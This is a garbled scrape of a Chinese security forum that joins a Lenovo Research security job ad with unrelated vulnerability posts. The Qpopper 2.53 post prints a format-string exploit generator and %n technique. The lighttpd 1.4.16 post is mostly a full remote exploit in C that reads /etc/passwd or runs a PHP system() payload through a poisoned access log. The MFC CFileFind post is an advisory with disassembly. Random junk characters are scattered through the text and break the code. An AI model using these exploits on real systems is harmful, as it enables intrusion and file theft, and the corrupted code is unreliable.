[人才招聘] [招聘] 联想研究院 安全职位 联想研究院, 移动互联网, 安全相关, 手机安全, 计算机

webmaster

资深安全架构设计师（北京）
* P9 F( o# H: R2 ]& Y. M# Q职责描述：
, e& l; O+ u  b& s6 ~/ R+ H1. 移动互联网智能终端安全相关技术,产品和方案的研究和开发
( f3 i. y6 [+ k7 L6 E4 v5 C6 ?2. 移动互联网可信计算创新型应用和服务的研究； 8 k: F8 N9 u* K  n8 \" b/ z/ u
3. 研究和实现智能终端可信计算解决方案，包括手机安全支付，手机银行，DRM, 文件加解密，安全邮件系统等。
* ?$ F) H: V7 Y9 d4. 移动互联网安全方面的专利研究；
! `9 v* u7 ~& X
  s' j) ]# M3 \2 X! }, I岗位要求：
: L9 u+ F& L/ _2 R7 O% r1. 计算机和通讯相关专业研究生以上学历，本科8年以上工作经验； 7 U4 d, i8 S) B9 }8 a
2. 4年以上嵌入式领域安全工作经验，掌握TPM/TCM, PKI/CA等体系架构，熟悉业界各种嵌入式安全解决方案。对DRM, 电子支付安全、加密闪存等解决方案有较强的理论基础和实践经验； 6 h! l' P+ R4 E" M# |
3. 精通Linux内核和驱动开发； $ \: x" P, |6 C
4. 具备良好的职业素养和团队协作精神，以及较强的学习和交流能力； 5 H, M/ s, j9 E; j+ R. _
5. 英语CET-4以上，具有优秀的英语阅读能力。6 O7 d4 `5 m5 v  s0 @6 F2 e. i% A
  o# C2 S7 \1 f6 o
( B! e" ^" B2 F3 H" R- I1 T3 H0 I

* c& t% \6 _8 P( O  ^& q& ~& _系统安全设计师（北京）, l$ a7 E8 N* u
职责描述：
" A/ K" y1 _* ~2 ]( T0 T- K1. 移动互联网智能终端安全相关技术及产品的研究和开发
* C5 l$ F# M, }1 c' J) X( s! k2. 分析Android系统实现，根据Android的安全机制，完善并改进Android系统的安全实现，为Android应用系统终端应用提供安全支撑。
2 r& V3 \8 s6 ~' D3. 移动互联网安全方面的专利研究；
; c" ^$ x4 p! Q7 i, M% u4 v) ^
: \' U" d, V1 Q  M* @岗位要求：% o# t2 J/ P* g* S9 h0 V
1. 计算机和通讯相关专业研究生以上学历； 5 Z' H8 l9 }# g: v" x% d
2. 3年以上Linux安全相关领域工作经验，精通Linux系统；熟练掌握java,c语言； " h. V9 K6 N! T1 w& J
3.一年以上NFC开发经验，熟悉android framework 和 JVM，对android系统有全面的了解，能根据需求规格独立进行设计和开发工作; 9 N& l9 o+ `1 v. R, o3 Y
4. 熟悉系统安全和网络安全相关知识，对系统加固、应用安全、入侵检测、病毒防护、防火墙等有一定的理论基础和实践经验； : h; P1 B5 r  e/ p
5. 具备良好的职业素养和团队协作精神，以及较强的学习和交流能力； , Q  ^* u  @" @
6. 英语CET-4以上，具有优秀的英语阅读能力
. P! j; _1 h  V
# h( b) G; X1 }4 Z, }
3 M$ r- E( R" {" _, |7 O% u/ U
; i2 f) H0 p6 y+ g% q5 Kandroid应用安全资深工程师（北京）8 k, N- S& j. A6 V! L3 Q
职责描述：* X$ {; B" R& S
1、负责联想应用商店应用安全测试方案的架构设计及持续改进: x+ x0 G: B  O
2、充分利用内外部资源，带领团队组强具体实施- U: m3 [( o0 K

6 ~9 q( H! }7 f% ^8 b岗位要求：
7 I  e3 Z& D: l9 c" {" A# l; q1 计算机、通信或相关专业本科及以上。本科需工作3年以上，硕士需工作1年以上。
! P7 b7 f# ^9 P2 [/ U  G2 有多年网络安全/系统安全的开发或测试经验，熟悉智能手机恶意代码的工作机制，对智能手机安全领域有深刻的理解。
* l! a8 u6 y" ?3 熟悉linux/android平台。: P( Y- i3 w8 f8 W4 a! E  ]8 \
4 具备很强的JAVA反编译和语法分析能力，分析过多种智能手机恶意代码，善于发现和总结程序特征。/ W$ G1 [4 |( C* m
4 掌握智能手机应用行业内的安全性测试最佳实践，能够设计安全性测试方案和组织具体实施, E: C; x+ m! _/ Q! L" r
5 带领过5人以上的团队1 \. v7 s9 O3 c! f, H
6 参与过智能手机安全软件的开发和测试者优先考虑。
9 f# h+ T0 R+ v3 P6 e+ i' v$ h/ h
% g+ A& N  |3 [$ k/ w" ^5 U! T, b
猎头顾问Moon(郝兴华) 2 y5 z; t/ C1 ?
Headhunting Consultant

jeffzua

本科 8 年。。。才8k？有点太夸张了吧。。。。小杨木JJ哦。。。:{:2_34:}

無情

只可远观也....." y9 F9 }8 w5 L3 `0 m; n
   :curse:

gaoqun2

远程获得shell之通过Qpopper2.53

---

<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>* U) k- q& e' P& s

* M) P* B2 |- B0 a7 m; q8 M7 a
: ^% h5 j0 G; U, H7 N9 ~" P, l' c  N1 G; O8 u  v
* 简述 Qpopper是使用相当广泛的POP3服务器，允许用户通过POP3客户端读他们的信件。它通常用于标准的UNIX系统里的邮件服务。
7 x1 T9 @8 p' ]4 o' q  w& Z2 k4 T) K, k: @0 |! ]

* [$ Q; b+ _# a2 `* 问题 在Qpopper2.53的版本中，QPOP的漏洞会使你远程获得一个gid=mail的shell。问题出在pop_msg()函数，当用户执行euidl命令时会出错，让我们检查一下Qpop2.53的代码吧： --> pop_uidl.c,在代码第150行处: ................ 　　　 sprintf(buffer, "%d %s", msg_id, mp->uidl_str); 　　　 if (nl = index(buffer, NEWLINE)) *nl = 0; 　　　 sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp)); !　　　return (pop_msg (p,POP_SUCCESS, buffer)); 　　　　　　　　　　　　　　　　　　^^^^^^^^^^^^^ ................. 在pop_msg.c中函数pop_msg()定义为：pop_msg(POP *p, int stat, const char *format,...), 这里有一个用户输入的format:) 　　好了，我们想象一下下面的情况吧： 　　MAIL FROM:<hakker@evil.org> 　　200 Ok 　　RCPT T<luser@host.withqpop253.com> 　　200 Ok 　　data 　　200 Okey, okey. end with "." 　　Subject: still trust qpop?=/ 　　X-UIDL: AAAAAAAAAAAAAAAA 　　From: %p%p%p%p%p%p%p 　　test 　　. 　　200 BLABLABLA Ok,message accepted for delivery. 然后用户luser连接到他的pop帐号并且运行euidl命令： +OK QPOP (version 2.53) at b0f starting. <666.666@b0f> USER luser +OK Password required for luser. PASS secret +OK luser has 3 messages (1644 octets). euidl 3 +OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028 Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p where implemented as arguments for vsnprintf() command. * 利用 　能够做到吧? 是的, 当然!但那有个小小的限制. Qpopper2.53运行于FreeBSD上的会比LINUX更难于利用，因为freebsd将pop_msg.c函数中的vsprintf()调用改成了vsnprintf()调用，两者之间有着显著的差别——当然也是可以利用的:)   利用程序 　　　-------- /*　qpop_euidl.c exploit by prizm/Buffer0verflow Security * *　Sample exploit for buffer overflow in Qpopper 2.53. *　This little proggie generates a mail u need to send. * *　Standard disclaimer applies. *　By the way, exploit is broken =) You need to insert shellcode. * *　MAD greets to tf8 for pointing out the bug, and all other b0f members. *　greets to USSRLabs and ADM *　checkhttp://b0f.freebsd.lublin.pl/ for news. */ #include <stdio.h> #include <string.h> char shellcode[]="imnothing"; int main(int argc, char *argv[]) { int i; unsigned long ra=0; if(argc!=2) { fprintf(stderr,"Usage: %s return_addr
' E/ v& A; l% U: B", argv[0]); exit(0); } sscanf(argv[1], "%x", &amp;ra); if(!ra)   return; if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) { fprintf(stderr,"Bad shellcode4 e5 m1 h1 T2 t. ^$ N# k
"); exit(0); } fprintf(stderr,"return address: 0x%.8x0 _" L: w0 H! j6 e* c7 W6 ~
", ra); printf("X-UIDL: "); for(i=0; i < sizeof(shellcode);i++) printf("%c", shellcode); printf("
, U' q* |( V. _; `  f"); printf("From: %s", "%.1000d"); for(i=0; i < 50; i++) printf("%c%c%c%c", (ra &amp; 0xff), (ra &amp; 0xff00)>>8, (ra &amp; 0xff0000)>>16, (ra &amp; 0xff000000)>>24); printf("@test% ]8 R, \& D" H: i% Q5 j, E
"); printf("Subject: test9 r& V) e$ r5 o- d) |! F: f
& O9 N7 y% o5 @
huh?0 J) G5 O4 ~1 _7 v- I
.( \; h4 k4 X) |) N
"); return 0; } 在FreeBSD上利用QPOP端口 --------------------- 　这不太容易，因为函数vsprintf()已经被vsnprintf()替代了，所以我们无法造成溢出，但我们仍然能够控制它——记得%n么？它的原理如下：这里面有个利用%n的小窍门。看看下面的代码吧，能否理解为什么其输出的结果是2000,而不是sizeof(b): ---<cut>--- #include <stdio.h> int main(void){ 　　　 int s=1; char b[1024]; int q; 　　　 snprintf(b, sizeof(b), "%.2000d%n", 1, &amp;q); 　　　 return printf("%d, overflowed? %s  u7 g( N' N- |# |* k0 ]
", q, (s==1?"NO":"YES")); } ---</cut>--- 在我的FreeBSD 3.4机器上我得到了以下结果:2000, overflowed? NO嘿，刚开始我希望能看到1024，但你知道——有时程序的运行并不容易控制，看看下面或许能有些帮助。 　　　 Exploiting it: a) 找出用户的输入在堆栈中的精确位置。 b) Compose a message with filed X-UIDL and From: X-UIDL: ppRETARETARETARETA From: <SHELLCODE>%.RETURNd%n@test 其中: "pp" 用来填充的(二至三个字节) "RETA"　 表示返回的SHELLCODE的地址 "SHELLCODE" guess "RETURN" 返回地址 c) 如果你需要freebsd版本的利用程序——自己动手吧:) * 存在漏洞的版本 2.53(其它呢?不确定……)    * 补丁 你可以http://www.eudora.com/freeware/qpop.html#CURRENT下载到Qpopper 3.1的版本，其中这个问题已经解决。或者你可以自己动手修改代码：在pop_msg.c的150行及62行, 将: - return (pop_msg (p,POP_SUCCESS, buffer)); 修改为: + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); </TABLE>' X, A( ~5 D  z2 b5 o6 f

7 a2 X3 U2 R* c2 C- Z0 ?2 o
+ m8 K  G3 _/ i5 _4 O; R1 W" z' B( x7 x$ U1 q

7 n( G7 B% M- |* Y/ j5 p
+ R% J& M" v$ a* l
3 b! K+ q  j% B* U- `
1 e+ s( z% N7 _+ e9 x" o. @2 x4 u9 {) \9 }% t9 @/ J) [
# s8 B* i5 {. v
# |- V6 x, C5 b: h) q
9 {- h5 c$ m  `) }

3 r' Y4 T  F; S+ F, F- i* Z& y1 {
+ u- d; D# |4 v1 @0 q, [$ R
8 i; m9 S4 N2 e$ ~/ O; I
. M( k6 ]5 E/ U; V
4 {7 `# @* U2 v8 U6 w) X
( a' E" u- C, z
4 X9 Y5 V7 M: q; l公告：https://www.sitedirsec.com公布最新漏洞，请关注

arja

httpd服务器1.4.16 FastCGI Header溢出漏洞

---

一个与Apache类似的东西!

2 S  C) a8 b8 ~4 x. `5 b

/** Remote Lighttpd + FastCGI + PHP example exploit** Tested with Lighttpd 1.4.16 and PHP 5.2.4** To avoid abuse there's a "remove me" in the code.** Example:** # ./exploit localhost 80 /etc/passwd** or** # wget --referer="<?php system('/usr/bin/id'); ?>" localhost* # ./exploit localhost 80 /var/log/lighttpd/access.log ** * Mattias Bengtsson <mattias@secweb.se>** http://www.secweb.se/**/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <sys/types.h>#include <sys/socket.h>#include <netdb.h>#include <arpa/inet.h>#include <netinet/in.h>int append_header(char *p, int c, int a, int b){c = 0x41 + (c % 25);memset(p, c, a + b + 4);p[a + 0 + 0] = ':';p[a + 0 + 1] = ' ';p[a + b + 2] = '& @& o" g) Z$ d. T: a2 {6 N
';p[a + b + 3] = '
4 u- `! X) S7 B$ I# z';return a + b + 4; }int network(const char *host, int port){struct sockaddr_in addr;struct hostent *he;int sock;sock = socket(AF_INET, SOCK_STREAM, 0);addr.sin_family = AF_INET;if((he = gethostbyname(host)) == NULL)return 0;memcpy(&amp;addr.sin_addr, he->h_addr_list[0], he->h_length);addr.sin_port = htons(port);connect(sock, (struct sockaddr *)&amp;addr, sizeof(addr));return sock;}int main(int argc, char **argv){char *b, *p;int sock, i;char tmp[1024];if(argc < 4) {fprintf(stderr, "Usage: %s <host> <port> <file>; u& F) E. \) R4 j" Q
", argv[0]);exit(0);}sock = network(argv[1], atoi(argv[2]));if(sock <= 0) {fprintf(stderr, "Host down?0 s6 E0 W- R6 m& y
");exit(0);}b = p = malloc(0xffff + 0xffff);p += sprintf(p, "GET /index.php HTTP/1.1; r3 S, A7 X1 X1 z2 K: P. N4 ]- ^
");p += sprintf(p, "Host: %s
7 o$ E# X* V0 ]- d1 t1 r2 p", argv[1]);p += sprintf(p, "A: A
# b- V) Z, n7 E8 I1 H9 a$ CB: ");*p++ = 128;*p++ = 0x00;*p++ = 0x54;*p++ = 0x42;*p++ = '
3 \# G8 P6 J; T2 ^6 ^';*p++ = '& N9 p' C" S" T5 P3 m+ \* d+ A
';p = 0x00;p += append_header(p, 0, 4, 1);p += append_header(p, 1, 200 , 25079);p -= 3631;*p++ = 1; // Version*p++ = 4; // Type*p++ = 0;*p++ = 0;i = sprintf(tmp, "SCRIPT_FILENAME");sprintf(tmp + i, "%s", argv[3]);*p++ = 0x00; // Length *p++ = 2 + strlen(tmp); // Length*p++ = 0x00; // Padding*p++ = 0x10;*p++ = i; // name_len*p++ = strlen(tmp) - i; // var_lenmemcpy(p, tmp, strlen(tmp));p += 3631 - 8 - 2;p += append_header(p, 2, 200, 40007);p += sprintf(p, "
4 a, h% s8 z4 s2 m
4 v9 O# C' G( ?6 @( P");write(sock, b, (p - b));i = read(sock, b, 0xffff);*(b + i) = 0;printf("%s8 S$ r$ m1 _7 P, L1 Y/ x  \$ s; R
", b);free(b);close(sock);return 0;}

+ O) j! O, `- W0 R- V2 f
2 q/ c+ n4 }# D! [, v
7 D& w4 T( _- q1 B$ E) f5 k
" @$ i$ \, ^: x+ i! v- O3 f; {3 }- B' ]/ W* y
+ d+ {$ m" w( R7 W! y

4 p8 m2 i- |  |, j$ D6 Y; H" _5 e( X' P% }9 W; I8 w

: l; d% J+ @8 D0 u7 G. V$ S
4 d# y, A, {) g6 ], e$ n8 Y; V  d/ [. S9 B+ M2 z

% \; h0 }: ^  T! u1 a1 [8 U, l3 ~% \: i

4 r* c+ e+ g% s! J4 d
; I  b6 ?. {/ Z+ E
$ _  Z: Y. U+ S1 M0 Q/ _! u2 _, o$ f6 A7 n

  e; h: U. L* r- h! Q' A+ T% |: r) p& E
公告：https://www.sitedirsec.com公布最新漏洞，请关注

xin0000

Microsoft MFC库CFileFind::FindFile 堆溢出漏洞

---

受影响系统：Microsoft Windows XP SP2

3 R9 f$ M+ C3 q0 y

描述：

) C( {* `" ]9 A; M

BUGTRAQ  ID: 25697CVE(CAN) ID: CVE-2007-4916

$ l# @; c$ \( T  y5 W' t' n

Microsoft Windows是微软发布的非常流行的操作系统。

3 P- B! s4 ?/ A& ?! |$ x+ j0 `

Windows系统中所提供的MFC42和MFC71库的CFileFind类在处理FindFile()函数参数时存在堆溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。

* e) D/ D% }% \$ K8 Y# g5 {) Q2 Z

MFC[42|71].dll@CFileFind::FindFile(char const *,unsigned long).text:73D6CD3F  mov     edi, edi.text:73D6CD41  push    ebp.text:73D6CD42  push    esi             ; unsigned int.text:73D6CD43  push    edi             ; unsigned __int8 *.text:73D6CD44  mov     esi, ecx.text:73D6CD46  call    CFileFind::Close(void).text:73D6CD4B  push    140h                    ; int   << 320 bytes.text:73D6CD50  call    @operator new(uint)             << buffer Allocate [1].text:73D6CD55  mov     ebp, [esp+14h].text:73D6CD59  and     dword ptr [esi+10h], 0.text:73D6CD5D  test    ebp, ebp.text:73D6CD5F  pop     ecx.text:73D6CD60  mov     [esi+8], eax.text:73D6CD63  jnz     short loc_73D6CD6A.text:73D6CD65  mov     ebp, offset a__1        ; "*.*" << si arg_0 == NULL.text:73D6CD6A loc_73D6CD6A; CODE XREF: CFileFind::FindFile(char const*,ulong)+24j.text:73D6CD6A    push    ebp                           ; lpString2.text:73D6CD6B    add     eax, 2Ch.text:73D6CD6E    push    eax                           ; lpString1.text:73D6CD6F    call    ds:__imp__lstrcpyA@8          ; lstrcpyA(x,x) << [2].text:73D6CD75    push    dword ptr [esi+8]             ; lpFindFileData.text:73D6CD78    push    ebp                           ; lpFileName.text:73D6CD79    call    ds:__imp__FindFirstFileA@8    ; FindFirstFileA(x,x)[...]

7 ?9 o/ ~# N) v- n8 C7 Y  J

MFC[42|71]u.dll@CFileFind::FindFile(char const *,unsigned long).text:5F817BFC  push    ebx                     ; wchar_t.text:5F817BFD  push    esi                     ; wchar_t *.text:5F817BFE  push    edi.text:5F817BFF  mov     esi, ecx.text:5F817C01  call    CFileFind::Close(void).text:5F817C06  push    250h                    ; int   << 592 bytes.text:5F817C0B  call    @operator new(uint)             << buffer allocate [1].text:5F817C10  mov     ebx, [esp+14h].text:5F817C14  and     dword ptr [esi+10h], 0.text:5F817C18  test    ebx, ebx.text:5F817C1A  pop     ecx.text:5F817C1B  mov     [esi+8], eax.text:5F817C1E  jnz     short loc_5F817C25.text:5F817C20  mov     ebx, offset a_          ; "*.*" << si arg_0 == NULL.text:5F817C25 loc_5F817C25; CODE XREF: CFileFind::FindFile(ushort const*,ulong)+22j.text:5F817C25    push    ebx                           ; lpString2.text:5F817C26    add     eax, 2Ch.text:5F817C29    push    eax                           ; lpString1.text:5F817C2A    call    ds:__imp__lstrcpyW@8          ; lstrcpyW(x,x) << [2].text:5F817C30    push    dword ptr [esi+8]             ; lpFindFileData.text:5F817C33    push    ebx                           ; lpFileName.text:5F817C34    call    ds:__imp__FindFirstFileW@8    ;FindFirstFileW(x,x)[...]

2 B/ J4 t% h& e! D% s

FindFile方式为[1]处的缓冲区分配内存，然后未经检查便储存了[2]处函数的第一个参数的内容。如果用户提交了超长参数的话就可以触发堆溢出，导致执行任意指令。

5 U8 z9 B3 I  |% h2 f

厂商补丁：

4 A% a8 z- Q; M' z0 b: k# w

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

0 y+ {) V% ~' v) k1 Q0 P

http://www.microsoft.com/technet/security/

) G6 A. }, S- j+ t
: i2 x: z, w5 `! N1 n/ m
; s' S: ?$ [& j& a/ S: {# z

; ~# m+ O' n, L) o5 O1 x
" J/ }# T& N+ u! C, B6 @
4 l! z) J6 a% t0 S* t  O8 d
% ?& ^3 t! v: k8 {: b: f  A( j' B- F. N7 ?

( y! V8 _, y; V' P3 @$ F5 b: V0 B0 I7 J. J# _! }

2 o, }8 s8 u! A
# C. }, v" V4 c- n
2 Y- E9 t' n5 @$ Y8 G. v+ x, d
: T/ u7 O* g) D- x0 p, U
4 \: T  x# b, }, J7 g' S1 I1 j& p- ]& J  C  \) u
+ G/ G, e: V$ ?& d6 w+ j: I

9 e0 d3 `  U. V
8 U5 T! m+ Q( j0 u( S) G公告：https://www.sitedirsec.com公布最新漏洞，请关注